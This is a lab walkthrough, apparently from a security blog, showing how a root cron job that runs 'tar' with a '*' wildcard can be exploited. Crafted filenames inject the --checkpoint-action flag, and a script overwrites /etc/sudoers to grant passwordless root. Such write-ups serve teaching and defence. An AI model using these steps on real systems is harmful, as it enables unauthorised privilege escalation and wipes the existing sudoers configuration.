Linux Privilege Escalation: Wildcards with tar
I recently discovered a creative and unique Linux privilege escalation vector that exploits they way the wildcard operator (*) is interpreted in Linux shell commands.
This can be exploited in a few distinct cases, but I’ll be walking through how this can happen with a crontab running as root, that executes a bash script that uses a wildcard with tar. Let’s begin.
To start we can view our permissions and the user we are currently running as:
We can see we are running as the user ‘kali’, who has no sudo privileges. Viewing the crontabs that are running on my lab I observe the following:
The last crontab is running under the user ‘root’, and is executing a bash script ‘compressToBackup.sh’ located on in folder ‘TarWildCardPrivEsc’ located on the ‘kali’ users desktop. Inspecting this folder we can see it contains the following files:
We can see the user ‘kali’ has read permissions over the ‘compressToBackup.sh’ file so lets inspect this script.
Vulnerable bash script
#!/bin/bash
cd /home/kali/Desktop/TarWildCardPrivEsc/
tar -zcf /home/kali/Desktop/TarWildCardPrivEsc/backup.tgz *At first glance this may seem like a totally safe and unmalicous script… right? It just changes the current directory to ‘/home/…/TarWildCardPrivEsc’, and then uses
‘tar -zcf /home/kali/Desktop/TarWildCardPrivEsc/backup.tgz *’ command to compress the all the contents of the TarWildCardPrivEsc directory into this backup.tgz file.
The one symbol, ‘*’ , is what makes this seemingly safe script into an easy PE vector. When the wildcard operator ‘*’ is used, bash interprets it as this:
tar -zcf /home/.../TarWildCardPrivEsc/backup.tgz image.png randomfile.txt ... 31337h4ck3r8.zipThe wildcard * is replaced with a list of all the filenames in the current directory. As an attacker, we can leverage this and create specially crafted filenames that will be interpreted as flags for tar, instead of actual files.
We can use ‘tar — help’ to view some possibilities we can take advantage of by spoofing fake files.
Researching these flags further you may discover their is functionality to execute commands via the ‘ — checkpoint-action’ flag
For example see the below code demonstrating some possibilities:
tar -zcf /home/backup.tgz toBeBackedUp --checkpoint=1 --checkpoint-action=exec=whoami
or
tar -zcf /home/backup.tgz toBeBackedUp --checkpoint=1 --checkpoint-action=exec=sh privesc.shThe above two commands use the exec parameter of checkpoint-action to execute commands through the tar command. This is how we’ll abuse this:
# 1. Create files in the current directory called
# '--checkpoint=1' and '--checkpoint-action=exec=sh privesc.sh'
echo "" > '--checkpoint=1'
echo "" > '--checkpoint-action=exec=sh privesc.sh'
# 2. Create a privesc.sh bash script, that allows for privilege escalation
#malicous.sh:
echo 'kali ALL=(root) NOPASSWD: ALL' > /etc/sudoers
#The above injects an entry into the /etc/sudoers file that allows the 'kali'
#user to use sudo without a password for all commands
#NOTE: we could have also used a reverse shell, this would work the same!
#OR: Even more creative, you could've used chmod to changes the permissions
#on a binary to have SUID permissions, and PE that way
Now we wait a minute, the crontab will be run as the ‘root’ user, this executes a bash script which will use the tar command with the wildcard * to compress all the files in the ‘TarWildCardDirectory’ directory. The filenames ‘ — checkpoint=1’ and ‘ — checkpoint-action=exec=sh privesc.sh’, included by the wildcard, will be not interpreted as filenames, but instead as flags for the tar command. These flags will cause the execution of the ‘privesc.sh’ script, as root. This privesc.sh will give my user ‘kali’ sudo access. Now checking my sudo capabilities:
We can now see we have successfully privilege escalated to root!